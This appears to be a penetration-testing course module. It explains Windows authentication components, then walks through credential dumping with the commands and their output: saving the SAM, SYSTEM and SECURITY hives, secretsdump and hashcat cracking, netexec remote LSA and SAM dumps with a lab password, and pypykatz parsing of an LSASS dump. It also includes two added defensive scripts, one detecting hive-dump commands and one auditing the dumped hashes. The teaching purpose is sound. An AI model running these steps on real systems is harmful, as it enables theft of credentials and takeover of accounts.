Windows Authentication Process

The Windows client authentication process involves several components responsible for logon, credential retrieval, and credential verification. Windows supports two authentication protocols, NTLM and Kerberos, of which Kerberos is the more complex.

LSA (Local Security Authority)

The LSA is the component responsible for authenticating users, enforcing security policies, managing logons, and overseeing all aspects of local system security. It also translates usernames to SIDs (Security Identifiers) and manages user sessions.

Windows Authentication Process Diagram

Local interactive logon is handled via the coordination of several components:

  • Winlogon: Manages the user logon and logoff processes.
    • Launches LogonUI to prompt for credentials at logon
    • Handles password changes
    • Locks and unlocks the workstation
    • Winlogon is the only process that accepts logon requests from the keyboard; they arrive as RPC messages from Win32k.sys (the kernel-mode Win32 subsystem).
    • After credentials are collected, Winlogon sends them to LSASS for verification.
  • LogonUI: The user interface for logon.
  • GINA (Graphical Identification and Authentication): Provides the user interface for logon.
  • SAM: Stores user account information and credentials locally on the machine.
  • LSASS (Local Security Authority Subsystem Service): Responsible for enforcing security policies and managing user authentication.
    • LSASS consists of multiple modules and governs all authentication processes.
    • LSASS is located at C:\Windows\System32\lsass.exe and runs as a protected process.
    • Responsible for enforcing local security policies, authenticating users, and forwarding security events to the Event Log.
    • LSASS is essentially the “gatekeeper” of Windows security.
    • After initial logon, LSASS caches credentials in memory, creates access tokens, enforces security policies, and manages user sessions.
  • Msv1_0.dll: The NTLM authentication package.

SAM Database

The Security Accounts Manager (SAM) database is a critical component of Windows security that stores user account information and credentials locally on the machine. It is used for local authentication and is accessed by the Local Security Authority Subsystem Service (LSASS) during the authentication process. The SAM database contains hashed passwords, user rights, and group memberships, ensuring that user credentials are securely managed and verified during logon attempts.

SAM is located at C:\Windows\System32\config\SAM and is protected by the operating system to prevent unauthorized access. Direct access to the SAM file is restricted; only system processes such as LSASS read it during authentication.

Note that for domain accounts on workstations joined to Active Directory Domain Services, SAM is not consulted. Instead, authentication requests are forwarded to domain controllers, which manage user accounts and credentials for the entire domain.

SYSKEY.exe is a utility that provides an additional layer of security for the SAM database by encrypting its contents. This helps protect user credentials from being easily accessed or compromised.

SAM is stored in the registry at HKEY_LOCAL_MACHINE\SAM.

Attacking SAM, SYSTEM, and SECURITY Hives

With administrative access to a Windows system, we can dump the registry hives backing the SAM database, copy them to our machine, and crack the password hashes offline with tools such as hashcat or John the Ripper. Working offline helps avoid detection, since no persistent session has to be maintained on the target.

There are three registry hives on the target machine we can copy (given admin access):

  • SAM: Contains user account information and password hashes.
  • SYSTEM: Contains system configuration information, including the system key used to encrypt the SAM. This key is required to decrypt the hashes.
  • SECURITY: Contains security policy information and other security-related data.

We can back up these hives with the reg save command from an elevated command prompt:

reg save HKLM\SAM C:\Windows\temp\SAM
reg save HKLM\SYSTEM C:\Windows\temp\SYSTEM
reg save HKLM\SECURITY C:\Windows\temp\SECURITY

If we’re only interested in local user accounts, we technically only need the SAM and SYSTEM hives. However, having the SECURITY hive can be useful for other purposes, such as extracting LSA secrets and cached domain credentials.
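As an added defensive example (not part of the original post), the following Python script flags process-creation events whose command line saves the SAM, SYSTEM or SECURITY hive, which is exactly what the reg save commands above produce. The event records are constructed samples in the shape of Sysmon Event ID 1 / Security 4688 data, and their field layout is an assumption.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 style), not
# real telemetry. Assumed layout: (host, parent image, image, command line).
SAMPLE_EVENTS = [
    ("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
     r"reg save HKLM\SAM C:\Windows\temp\SAM"),
    ("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
     r"reg  save hklm\system C:\Windows\temp\SYSTEM"),
    ("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
     r'reg.exe save "HKEY_LOCAL_MACHINE\SECURITY" C:\Windows\temp\SECURITY'),
    ("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\reg.exe",
     r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
]

# Matches "reg save" or "reg export" of one of the three hives. Tolerates reg.exe,
# repeated spaces, quoting, mixed case and either the HKLM alias or the full root name.
HIVE_DUMP_RE = re.compile(
    r'\breg(?:\.exe)?\s+(?:save|export)\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)\b',
    re.IGNORECASE,
)

@dataclass
class Finding:
    host: str
    hive: str
    command_line: str

def detect_hive_dumps(events):
    """Return one Finding per event whose command line saves SAM, SYSTEM or SECURITY."""
    findings = []
    for host, _parent, _image, cmdline in events:
        m = HIVE_DUMP_RE.search(cmdline)
        if m:
            findings.append(Finding(host, m.group(1).upper(), cmdline))
    return findings

def hives_saved(findings):
    """Hive names seen per host; SAM plus SYSTEM on one host is enough for an offline dump."""
    seen = {}
    for f in findings:
        seen.setdefault(f.host, set()).add(f.hive)
    return seen

if __name__ == "__main__":
    for f in detect_hive_dumps(SAMPLE_EVENTS):
        print(f"[ALERT] {f.host}: {f.hive} hive saved via: {f.command_line}")
```

The regex deliberately ignores the destination path, since the hive name is the stable part of the command and the output location is attacker-chosen.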

We can use Impacket’s secretsdump.py tool to extract the hashes directly from the dumped hives:

rnemeth@htb[/htb]$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b:::
defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:683b72db605d064397cf503802b51857:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
sam:1002:aad3b435b51404eeaad3b435b51404ee:6f8c3f4d3869a10f3b4f0522f537fd33:::
rocky:1003:aad3b435b51404eeaad3b435b51404ee:184ecdda8cf1dd238d438c4aea4d560d:::
ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb1e1744d2dc4403f9fb0420d84c3299ba28f0643
dpapi_userkey:0x7995f82c5de363cc012ca6094d381671506fd362
[*] NL$KM 
 0000   D7 0A F4 B9 1E 3E 77 34  94 8F C4 7D AC 8F 60 69   .....>w4...}..`i
 0010   52 E1 2B 74 FF B2 08 5F  59 FE 32 19 D6 A7 2C F8   R.+t..._Y.2...,.
 0020   E2 A4 80 E0 0F 3D F8 48  44 98 87 E1 C9 CD 4B 28   .....=.HD.....K(
 0030   9B 7B 8B BF 3D 59 DB 90  D8 C7 AB 62 93 30 6A 42   .{..=Y.....b.0jB
NL$KM:d70af4b91e3e7734948fc47dac8f606952e12b74ffb2085f59fe3219d6a72cf8e2a480e00f3df848449887e1c9cd4b289b7b8bbf3d59db90d8c7ab6293306a42
[*] Cleaning up... 

Notice that secretsdump.py recovered several hashes. Each line follows the uid:rid:lmhash:nthash format printed in the header: the NT hash (what hashcat calls NTLM, mode 1000) is the final 32-character field, and the LM hash is the field before it. Modern Windows systems no longer store LM hashes by default, which is why every LM field above holds the same placeholder value.

We can copy these hashes into a text file and attempt to crack them using hashcat or John the Ripper. Only the NT hash field needs to be copied for cracking.

rnemeth@htb[/htb]$ sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

<SNIP>

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

f7eb9c06fafaa23c4bcf22ba6781c1e2:dragon          
6f8c3f4d3869a10f3b4f0522f537fd33:iloveme         
184ecdda8cf1dd238d438c4aea4d560d:adrian          
31d6cfe0d16ae931b73c59d7e0c089c0:                
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: dumpedhashes.txt
Time.Started.....: Tue Dec 14 14:16:56 2021 (0 secs)
Time.Estimated...: Tue Dec 14 14:16:56 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    14284 H/s (0.63ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 5/5 (100.00%) Digests
Progress.........: 8192/14344385 (0.06%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitetiger

Started: Tue Dec 14 14:16:50 2021
Stopped: Tue Dec 14 14:16:58 2021
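As an added example that is not part of the original post, this Python audit parses lines in the uid:rid:lmhash:nthash format shown in the secretsdump.py output above and reports the weak states a defender looks for in such a dump: accounts with the empty-password NT hash, accounts that still store an LM hash, and NT hashes shared between accounts (password reuse, since NT hashes are unsalted). The embedded lines are copied from this page's own sample run.

```python
import re

# Hash lines in the uid:rid:lmhash:nthash::: format printed by secretsdump.py, copied
# from the sample run on this page (status lines included to show they are skipped).
SECRETSDUMP_SAM_LINES = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::
[*] Dumping cached domain logon information (domain/username:hash)
"""

# Well-known values: the LM field stored when LM hashing is disabled, and the NT hash
# of the empty password (the hashcat run above cracks it to an empty candidate).
LM_DISABLED = "aad3b435b51404eeaad3b435b51404ee"
NT_EMPTY_PASSWORD = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.IGNORECASE)

def parse_sam_lines(text):
    """Yield (user, rid, lmhash, nthash) per hash line; anything else is ignored."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            yield user, int(rid), lm.lower(), nt.lower()

def audit_sam(text):
    """Report empty passwords, stored LM hashes and NT hashes shared between accounts."""
    rows = list(parse_sam_lines(text))
    # An empty NT hash means a blank password or a built-in account that is disabled
    # (Administrator is RID 500); confirm account status separately before acting.
    empty_password = [u for u, _, _, nt in rows if nt == NT_EMPTY_PASSWORD]
    lm_stored = [u for u, _, lm, _ in rows if lm != LM_DISABLED]
    by_hash = {}
    for u, _, _, nt in rows:
        by_hash.setdefault(nt, []).append(u)
    # NT hashes are unsalted, so equal hashes mean equal passwords (password reuse).
    shared = {nt: us for nt, us in by_hash.items()
              if len(us) > 1 and nt != NT_EMPTY_PASSWORD}
    return {"accounts": len(rows), "empty_password": empty_password,
            "lm_stored": lm_stored, "shared_nt_hash": shared}

if __name__ == "__main__":
    for key, value in audit_sam(SECRETSDUMP_SAM_LINES).items():
        print(f"{key}: {value}")
```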

Remotely Dumping LSA and SAM Secrets

With access to credentials that have local administrator privileges, it is also possible to target LSA secrets over the network. This may allow us to extract credentials from running services, scheduled tasks, or applications that store passwords using LSA secrets.

rnemeth@htb[/htb]$ netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

SMB         10.129.42.198   445    WS01     [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01     [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB         10.129.42.198   445    WS01     [+] Dumping LSA secrets
SMB         10.129.42.198   445    WS01     WS01\worker:Hello123
SMB         10.129.42.198   445    WS01      dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB         10.129.42.198   445    WS01     NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
SMB         10.129.42.198   445    WS01     [+] Dumped 3 LSA secrets to /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.secrets and /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.cached

Similarly, we can use netexec to dump hashes from the SAM database remotely.

rnemeth@htb[/htb]$ netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

SMB         10.129.42.198   445    WS01      [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01      [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB         10.129.42.198   445    WS01      [+] Dumping SAM hashes
SMB         10.129.42.198   445    WS01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB         10.129.42.198   445    WS01     bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB         10.129.42.198   445    WS01     sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB         10.129.42.198   445    WS01     rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB         10.129.42.198   445    WS01     worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB         10.129.42.198   445    WS01     [+] Added 8 SAM hashes to the database

Credential Manager

Credential Manager is a Windows feature that securely stores and manages user credentials, such as usernames and passwords, for various applications and services. It allows users to save their login information so that they can easily access resources without having to re-enter their credentials each time.

The credentials are encrypted and, by default, stored under C:\Users\[Username]\AppData\Local\Microsoft\Vault\ and C:\Users\[Username]\AppData\Local\Microsoft\Credentials\.

NTDS (NT Directory Services)

NTDS is the database that stores Active Directory data, including user accounts, group memberships, and security policies. It is used for authentication and authorization in domain environments.

Attacking LSASS

With administrative privileges on a Windows system, it is possible to dump the contents of the LSASS process memory and use tools like pypykatz or mimikatz to extract plaintext credentials, NTLM hashes, Kerberos tickets, and other sensitive information.

We can create the dump using Task Manager on the target, transfer the dump to our machine, and then use pypykatz to analyze it:

$ pypykatz lsa minidump lsass.dmp

pypykatz will parse the dump and extract any credentials it finds, displaying them in a readable format. We can then use hashcat to attempt to crack any NTLM hashes.
